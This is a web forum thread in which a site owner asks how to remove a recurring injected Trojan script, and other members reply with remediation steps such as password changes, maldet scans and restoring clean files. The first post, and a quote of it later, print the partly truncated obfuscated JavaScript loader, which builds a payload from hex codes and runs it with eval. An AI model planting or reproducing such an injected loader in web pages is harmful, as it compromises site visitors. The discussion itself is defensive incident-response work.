SitePoint Sponsor

User Tag List

Results 1 to 4 of 4
  1. #1
    SitePoint Zealot
    Join Date
    Oct 2009
    Location
    Oklahoma, USA
    Posts
    103
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    website has kryptic trojan - how do I remove

    A website that is built in dreamweaver has a kryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with eset and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.


    Here is the script that gets added to each page.
    Code JavaScript:
    <!--0242d5--><script type="text/javascript" language="javascript" >
    p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!2
    .......
    7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=195;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-449!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
    any help would be appreciated.
    Last edited by Mittineague; Apr 12, 2013 at 13:59. Reason: please don't post mal code
    Master of going the long way to get nowhere
    Web Design Muskogee, Oklahoma

  2. #2
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,181
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    I can't help with finding the source, but if you change your file permissions to read only, it might help to stop them being altered while you track it down.

  3. #3
    Robert Wellock silver trophybronze trophy xhtmlcoder's Avatar
    Join Date
    Apr 2002
    Location
    A Maze of Twisty Little Passages
    Posts
    6,316
    Mentioned
    60 Post(s)
    Tagged
    0 Thread(s)
    Perhaps you could try the http://www.bleepingcomputer.com/ Security forums since you haven't located the infection vector. Also change your passwords.

  4. #4
    Certified Ethical Hacker silver trophybronze trophy dklynn's Avatar
    Join Date
    Feb 2002
    Location
    Auckland
    Posts
    14,653
    Mentioned
    19 Post(s)
    Tagged
    3 Thread(s)
    Quote Originally Posted by dkchapuis View Post
    A website that is built in dreamweaver has a kryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with eset and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.


    Here is the script that gets added to each page.
    Code JavaScript:
    <!--0242d5--><script type="text/javascript" language="javascript" >
    p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!2
    .......
    7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=195;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-449!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
    any help would be appreciated.
    dk

    Your problem is that you have a breach in your security so (repeat of an earlier post):

    1. Immediatly delete all FTP access except one (master for the account).

    2. Change the master password (cPanel and FTP) to a VERY STRONG one using an http://strongpasswordgenerator.com password of sufficient length.

    3. Use maldet scans (on an Apache server) which find and report all forms of malware (viruses, worms and SCRIPTS which can cause problems). This will enable you to find and remove scripts which can be embedded in html, php and js scripts. Repeat the maldet scans until there are no files detected then add a CRON to run maldet scans on a regular basis. Be aware that recovery will primarily consist of DELETING all html, php and js files and replacing them with originals (from your master copies).

    4. Additionally, I use a script (via CRON) to verify that files have remain unchanged over the last xx hours for "peace of mind."

    5. Database: If you are running WordPress or the like (database verification for admin accounts), create a new admin and delete all other admin records.

    6. Update all "canned scripts" (e.g., WP, Zencart, etc.) and be sure that they're kept updated in order to prevent further attacks via security problems discovered in those scripts. This includes their third party plug-ins, too.

    7. Uploaded files: Be sure to do a thorough check of any file uploaded to your website (I limit uploaded files to images and they are resized by GD before being saved to my "webspace").

    Both staff members suggestions are good but too limited in scope. What you're allowing with JS like this is a barrage of SPAM being sent from your account. If you fail to close the security breach, your host should suspend your account then, failing application of good security, TERMINATE your account for breach of T&C (spamming).

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    mod_rewrite Tutorial Article (setup, config, test & write
    mod_rewrite regex w/sample code) and Code Generator


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •